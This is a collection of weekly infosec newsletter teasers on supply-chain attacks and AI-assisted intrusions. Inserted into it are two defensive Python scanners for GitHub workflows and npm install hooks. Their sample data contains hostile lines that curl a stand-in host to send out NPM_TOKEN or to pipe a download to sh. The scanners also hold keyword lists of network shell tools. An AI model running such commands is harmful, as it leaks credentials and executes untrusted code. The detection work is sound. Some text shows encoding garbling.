🕵🏻‍♂️ [InfoSec MASHUP] 23/2026 - Built Broken, Patched by Others

Another week, another set of trojaned packages, hijacked registries, and one-click credential theft. The operational response is by now well-rehearsed: patch, rotate secrets, enable 2FA, audit your dependencies, check your CI/CD workflows. The patching teams are doing their jobs. The question this week's malware section keeps nudging at is a different one: why is so much of what they're patching broken at the point of creation?

The supply chain attack surface exists because the software ecosystem normalized shipping fast over shipping secure, because package registries scaled adoption without scaling trust infrastructure, and because the developer who published a package with a hardcoded credential and the organization running it in production are rarely the same person bearing the consequences. #IBM and #RedHat just committed $5 billion to fix this upstream. #CISA launched CI Fortify to help #OT operators survive worst-case scenarios downstream. Both efforts are necessary. Both are also symptoms of an industry that has spent decades externalizing the cost of insecure software onto the people least positioned to refuse it.

→ Week #23/2026 also covers: Palo Alto Networks GlobalProtect auth bypass is actively exploited, Weil, Gotshal & Manges LLP reportedly paid $20M to keep client files quiet, and the #EU is moving to limit U.S. cloud in sensitive infrastructure.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-23-2026-built-broken-patched-by-others

If you find it useful, subscribe to get it in your inbox every weekend 📨

#infosecMASHUP #cybersecurity #infosec #threatintel #AI


🕵🏻‍♂️ [InfoSec MASHUP] 22/2026 - The Patch Is Scaling. So Is the Attack.

#Megalodon backdoored 5,500 #GitHub repositories in six hours. Not six days — six hours. Malicious commits silently replacing CI/CD workflows, hoovering tokens, cloud credentials, SSH keys, and environment variables before most of the affected projects had processed a single alert. The same week, #IBM and #RedHat announced a $5 billion commitment, called Project Lightwell, to securing the open source supply chain, #Anthropic's #Mythos model surfaced 23,000 potential vulnerabilities across 1,000 OSS projects, and Apple open-sourced its quantum-resistant crypto stack with formal verification proofs attached. The industry's response to supply chain risk is finally arriving at a scale that looks serious.

The problem is the math. The response is measured in billions of dollars and multi-year programs. The attack is measured in hours and automated tooling. Megalodon's six-hour window isn't an anomaly — it's a benchmark. Last week it was TeamPCP and the GitHub cascade. The week before, Laravel Lang and malicious postinstall hooks across 700 repos. The investment in defense is real and necessary, but it's being deployed against a threat that doesn't need a budget cycle to iterate. Project Lightwell will fund important work. Megalodon already shipped.

→ Week #22/2026 also covers: #ShinyHunters hit Carnival, Charter, and Mytheresa, the Dutch blocked a U.S. takeover of their national ID infrastructure, and Iran-linked actors are coding backdoors with AI assistance.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-22-2026-the-patch-is-scaling-so-is-the-attack

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel #AI


🕵🏻‍♂️ [InfoSec MASHUP] 21/2026 - The Supply Chain Didn't Break. It Was Walked.

This week's issue reads like a case study in cascade failure. A malicious VS Code extension on one #GitHub employee's device leads to 3,800 internal repositories exfiltrated — by #TeamPCP, the same group that poisoned 170 npm and #PyPI packages last week. #Grafana gets breached via a token nobody rotated after the TanStack attack, itself a TeamPCP operation. A GitHub Action used by thousands of projects gets compromised and starts exfiltrating CI/CD credentials. And somewhere in a public GitHub spreadsheet, CISA contractor credentials — including #AWS GovCloud keys — sat waiting to be found.

These aren't four separate incidents. They're one incident with four manifestations. The supply chain isn't a vector anymore; it's the terrain. Developer tooling, CI/CD pipelines, third-party actions, tokens issued and forgotten โ€” all of it is now actively mapped and exploited with a persistence that makes the traditional "patch and move on" response look quaint. The Verizon DBIR dropped this week noting that third-party compromise is surging. The week's news was already illustrating the point before the report landed.
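Week 21 and week 22 above turn on the same two CI failure modes: a third-party action whose mutable tag now points at attacker code, and a workflow rewritten to ship the runner's tokens out. The script below is an added example, not code from the newsletter or from any project it names. It audits one GitHub Actions workflow file for the two checks a practitioner runs first: actions not pinned to a full 40-character commit SHA, and run steps that reference a `${{ secrets.* }}` value alongside a network or encoding command. It also notes a `pull_request_target` trigger, which runs with the base repository's token. The workflow text, the owner `someorg`, the placeholder SHA and the `example.invalid` host are constructed sample data.

```python
import re

# A 40-hex-char ref is a commit SHA; a tag or branch can be moved under you.
SHA40 = re.compile(r"^[0-9a-f]{40}$")
USES_RE = re.compile(r"^\s*(?:-\s*)?uses:\s*['\"]?([^\s'\"#]+)")
RUN_RE = re.compile(r"^\s*(?:-\s*)?run:\s*(.*?)\s*$")
SECRET_RE = re.compile(r"\$\{\{\s*secrets\.\w+\s*\}\}")
NET_RE = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|base64)\b")
PR_TARGET_RE = re.compile(r"^\s*(?:-\s*)?pull_request_target\s*:?\s*$")


def audit_workflow(text, trusted_owners=("actions",)):
    """Scan one workflow file; return a list of (line, severity, message)."""
    findings = []
    run_start = None      # line number of the run: key being collected
    run_indent = 0
    run_lines = []

    def close_run():
        # A run block that reads a secret AND calls a network/encoding tool
        # has the shape of a token-exfiltration step; report it.
        body = "\n".join(run_lines)
        if run_start is not None and SECRET_RE.search(body) and NET_RE.search(body):
            findings.append((run_start, "high",
                             "run step passes a repository secret to a network/encoding command"))

    for lineno, line in enumerate(text.splitlines(), 1):
        indent = len(line) - len(line.lstrip(" "))
        if run_start is not None:
            # Block scalars (run: |) continue while lines are indented deeper.
            if not line.strip() or indent > run_indent:
                run_lines.append(line)
                continue
            close_run()
            run_start, run_lines = None, []
        m = USES_RE.match(line)
        if m:
            ref = m.group(1)
            if ref.startswith(("./", "docker://")):
                continue  # local action or container image, not a marketplace ref
            repo, _, version = ref.partition("@")
            if not SHA40.match(version):
                owner = repo.split("/")[0]
                sev = "medium" if owner in trusted_owners else "high"
                findings.append((lineno, sev, f"action not pinned to a commit SHA: {ref}"))
            continue
        m = RUN_RE.match(line)
        if m:
            run_start, run_indent, run_lines = lineno, indent, [m.group(1)]
            continue
        if PR_TARGET_RE.match(line):
            findings.append((lineno, "medium",
                             "pull_request_target trigger: job runs with the base repo's token; "
                             "confirm it never checks out or executes fork-supplied code"))
    close_run()
    return findings


# Constructed sample workflow (placeholder SHA, fictitious owner and host).
SAMPLE_WORKFLOW = """\
name: ci
on:
  push:
  pull_request_target:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - uses: someorg/release-helper@main
      - name: Build
        run: npm ci && npm run build
      - name: Publish
        run: |
          TOKEN="${{ secrets.NPM_TOKEN }}"
          curl -s -X POST -d "$TOKEN" https://example.invalid/collect
"""

if __name__ == "__main__":
    for line, sev, msg in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {line:>3} [{sev}] {msg}")
```

The scanner is a triage hint, not a verdict: a `curl` to the GitHub API with `secrets.GITHUB_TOKEN` is normal, so review each high finding by hand. Run it over every file under `.github/workflows/` and treat any tag-pinned third-party action as a change request, since a SHA pin is what makes a compromised release of that action a no-op for your pipeline.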

→ Week #21/2026 also covers: fast16 predated #Stuxnet and corrupted nuclear simulations quietly, #Pwn2Own Berlin paid $1.3M for 47 bugs, and #Bluesky got hijacked for Russian propaganda.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-21-2026-the-supply-chain-didn-t-break-it-was-walked

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel #AI


🕵🏻‍♂️ [InfoSec MASHUP] 20/2026 - The Platform Is the Attack Surface.

The supply chain attack story this week isn't about a sketchy package lurking in a dark corner of npm. It's about #Anthropic Claude.ai shared chats being used to distribute Mac #malware, a fake Hugging Face repository impersonating OpenAI's Privacy Filter trending at #1 with 244,000 downloads, and JDownloader's own website serving swapped installers. The common thread isn't sophistication — it's borrowed credibility. Attackers have figured out that the detection model most users rely on, implicitly or otherwise, is "I've heard of this platform, therefore this thing on it is probably fine."

That assumption has always been fragile. What's changed is how systematically it's being exploited. A trending repo with a quarter-million downloads looks legitimate by every surface signal. A shared Claude.ai chat looks like a helpful resource. A download from the official project website looks like the official project. The trust isn't in the content — it's in the container. And the container is now the attack surface.

→ Week #20/2026 also covers: #ShinyHunters got paid, #TeamPCP hit 170 packages across npm and PyPI, and Cisco's SD-WAN zero-day count hit six for the year.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-20-2026-the-platform-is-the-attack-surface

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel #AI


🕵🏻‍♂️ [InfoSec MASHUP] 19/2026 - Offense Just Got a Co-Pilot

The story that should not get buried under this week's patch pile is a quiet one from the ICS/OT section: attackers used #Claude and #ChatGPT to assist an intrusion into a water utility in Monterrey. The OT #breach ultimately failed — but that's almost beside the point. What the Dragos report actually documents is AI being used as a competent recon assistant: autonomously identifying a vNode SCADA/IIoT interface, recommending a password-spray attack, and generating a Python toolkit on the fly. No novel exploit. No nation-state budget. Just patience and a chat window.

This is the part of the AI-in-security conversation that tends to get lost between the breathless vendor marketing and the "fully autonomous AI attacks are not yet observed" reassurances. The threat doesn't need to be autonomous to be meaningful. Lowering the reconnaissance floor — making #OT infrastructure more legible to attackers who previously lacked the domain knowledge to navigate it — is already a significant capability shift. The Monterrey incident didn't succeed. The next one will be run by someone who learned from it.

→ Week #19/2026 also covers: A 64-day cPanel zero-day window, #ShinyHunters hits an ed-tech giant, and Europe blocks #Huawei from its solar grid.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-19-2026-offense-just-got-a-co-pilot

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel #AI


🕵🏻‍♂️ [InfoSec MASHUP] 18/2026 - ShinyHunters' Week Off (They Didn't Take One)

This week's news cycle handed us the usual parade of breaches, arrests, and patch-your-stuff urgency — but if you squint at the #Malware section long enough, a more uncomfortable story emerges. #SAP-related npm packages backdoored with a credential stealer. A popular #PyPI package hijacked via a forged signed release pushed through a compromised GitHub Actions workflow. Seventy-three "sleeper" extensions quietly sitting in #OpenVSX, waiting. The common thread: attackers aren't breaking down the front door anymore. They're walking in through the tools developers use every day, often with a valid signature and a clean commit history.

What makes this particularly fun — in the way a slow-motion disaster is fun — is that the blast radius isn't just the developer who ran pip install. It's every downstream user, every CI/CD pipeline, every AI coding agent that helpfully executed the preinstall hook without asking questions. The supply chain isn't a niche threat vector reserved for nation-state ops anymore. It's where commodity attackers are increasingly playing, because it scales beautifully and the detection gap remains embarrassingly wide.
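The preinstall hook in the paragraph above is the concrete thing to hunt for: npm runs `preinstall`, `install` and `postinstall` for every registry package unless told not to. The script below is an added example, not code from the newsletter or from npm. It builds a small constructed `node_modules` tree and lists every package that declares an install-time lifecycle script, sorting commands that look like download-and-execute to the top. The package names `tiny-util`, `native-thing` and `helpful-sdk`, their versions and their commands are invented sample data.

```python
import json
import os
import tempfile

# npm runs these automatically when installing a dependency from the registry
# (prepare additionally fires for git dependencies and for the root project).
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
# Rough download-and-execute / obfuscation markers; a triage hint, not a verdict.
SUSPICIOUS = ("curl ", "wget ", "node -e", "eval(", "base64",
              "child_process", "/dev/tcp", "powershell")


def find_install_scripts(node_modules):
    """Walk node_modules and report every package.json that declares an
    install-time lifecycle script. Suspicious-looking commands sort first."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(node_modules):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                pkg = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or non-JSON manifest: skip, don't abort the scan
        scripts = pkg.get("scripts") or {}
        for hook in LIFECYCLE:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            hits.append({
                "package": f"{pkg.get('name', '?')}@{pkg.get('version', '?')}",
                "hook": hook,
                "command": cmd,
                "suspicious": any(tok in cmd for tok in SUSPICIOUS),
            })
    return sorted(hits, key=lambda h: (not h["suspicious"], h["package"]))


def build_demo_tree():
    """Write a constructed node_modules tree to a temp dir (sample data, not a
    real install) and return the node_modules path."""
    root = tempfile.mkdtemp(prefix="nm-demo-")
    packages = [
        {"name": "tiny-util", "version": "3.1.0",
         "scripts": {"test": "node test.js"}},                 # no install hooks
        {"name": "native-thing", "version": "1.0.0",
         "scripts": {"postinstall": "node-gyp rebuild"}},    # plausible native build
        {"name": "helpful-sdk", "version": "2.4.1",          # download-and-execute hook
         "scripts": {"preinstall": "node -e \"require('child_process')"
                     ".execSync('curl -s https://example.invalid/i | sh')\""}},
    ]
    for pkg in packages:
        pkg_dir = os.path.join(root, "node_modules", pkg["name"])
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(pkg, fh)
    return os.path.join(root, "node_modules")


if __name__ == "__main__":
    for h in find_install_scripts(build_demo_tree()):
        flag = "SUSPICIOUS" if h["suspicious"] else "review"
        print(f"{flag:10} {h['package']:22} {h['hook']:11} {h['command']}")
```

The control itself is `npm ci --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) in CI and on developer machines, followed by an explicit `npm rebuild <pkg>` for the short allowlist of packages that genuinely need a native build. This scan only sees hooks declared in the manifest; code that runs when the package is first required is invisible to it, so pair it with review of lockfile diffs rather than treating an empty report as a clean bill of health.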

→ Week #18/2026 also covers: Supply chain attackers found the path of least resistance, #OpenSSH patched a bug older than most junior devs, and #Europe is done pretending U.S. #cloud is a neutral choice.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-18-2026-shinyhunters-week-off-they-didn-t-take-one

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel #AI


🕵🏻‍♂️ [InfoSec MASHUP] 17/2026 - Bolt-On Security Won't Cut It

Attackers have AI. So now defenders need #AI. So vendors are shipping fast. And somewhere in that chain, someone hands access to a third-party vendor, and Anthropic's most restricted product ends up in unauthorized hands. This is the new normal: accelerated development, accelerated deployment, and an attack surface that grows with every integration.

The pressure is real — threat actors are using AI to find vulnerabilities faster, craft more convincing phishing, and automate what used to require skill and time. The defensive tooling market is responding accordingly, and Anthropic's #Mythos is just the most visible example of a broader wave. But visibility cuts both ways. The more these tools embed themselves into organizational security infrastructure, the more they become targets themselves. A tool that finds 271 #Firefox #bugs is a tool someone else very much wants access to.

The answer isn't to slow down — it's to stop treating secure architecture as something you bolt on after shipping. Secure development practices, supply chain controls, and disciplined access management aren't obstacles to speed. They're what makes speed sustainable. The threat isn't going to wait for the industry to catch up, but neither will the next vendor breach. Align the pace of deployment with the rigor of the process — or expect to keep reading about it here.

→ Week #17/2026 also covers: Scattered Spider pleads guilty, a #ransomware negotiator on the wrong payroll, and a China-linked #backdoor in US federal Cisco firewalls.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-17-2026-bolt-on-security-won-t-cut-it

If you find it useful, subscribe to get it in your inbox every weekend 📨

#infosecMASHUP #cybersecurity #infosec #threatintel #AI


๐Ÿ› Faster Bugs, Same Backlog โ€” #Mythos Preview found thousands of zero-days across every major OS and browser in a matter of weeks. Anthropic was nervous enough about it to not release it publicly. That's notable. What's also notable is that "thousands of critical vulnerabilities" describes a perfectly ordinary patch Tuesday for most security teams โ€” the backlog isn't new, the speed is.

The uncomfortable truth Project #Glasswing surfaces isn't that attackers are about to get a superpower (they are); it's that defenders have been relying on a fundamentally broken triage model for years. CVSS 10 gets the fire drill. The exploitable CVSS 6 sitting on an internet-facing legacy box gets the backlog. That gap is the actual attack surface. AI-accelerated discovery doesn't fix it — it just makes it more expensive to ignore.

→ Week #16/2026 also covers: AI vishing platforms hit the cybercrime market, NIST quietly caps CVE coverage, and Russia goes after a Swedish power grid.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-16-2026-faster-bugs-same-backlog

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel #AI


🕵🏻‍♂️ [InfoSec MASHUP] 15/2026 - Budgets Cut, Breaches Climbing

Cybercrime losses hit $20.9 billion in 2025 — a 26% jump, per the FBI's IC3 report. That figure covers only what victims bothered to report, so treat it as a floor, not a ceiling. This week's issue arrives alongside a proposal to cut CISA's budget by $707 million. Whether that's a bold strategic bet or a spectacular misread of the moment is, apparently, still under debate.

→ Week #15/2026 also covers: REvil's alleged leader unmasked, Adobe Reader zero-day since December, and the most uncomfortable job interview you'll watch this week.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-15-2026-budgets-cut-breaches-climbing

If you find it useful, subscribe to get it in your inbox every weekend 📨

#infosecMASHUP #cybersecurity #infosec #threatintel #AI


🕵🏻‍♂️ [InfoSec MASHUP] 13/2026 - RSA Week, Real World Problems

RSA Conference was in full swing in San Francisco this week — booths, buzzwords, and billion-dollar pitches as far as the eye can see. Meanwhile, out in the real world, threat actors didn't get the memo. Iran-linked hackers are using Telegram to hunt down dissidents and journalists, while TeamPCP's supply chain worm is deploying Kubernetes wipers that specifically target Iranian clusters. Two sides of the same geopolitical coin, playing out in parallel — and neither one is buying a vendor badge.

→ Week #13/2026 also covers:

🪱 TeamPCP's worm;

🇮🇱 🇮🇷 Iran's hacked cameras;

🆙 ✅ A Tycoon 2FA that just won't die;

❌ 🇺🇸 The FCC has banned the sale of new consumer routers made outside the USA;

💰️ #OpenAI launched a public safety bug bounty for #AI-specific abuse and safety risks.

Full issue 👉 https://infosec-mashup.santolaria.net/p/infosec-mashup-13-2026-rsa-week-real-world-problems

If you find it useful, subscribe to get it in your inbox every weekend 📨 #infosecMASHUP #cybersecurity #infosec #threatintel
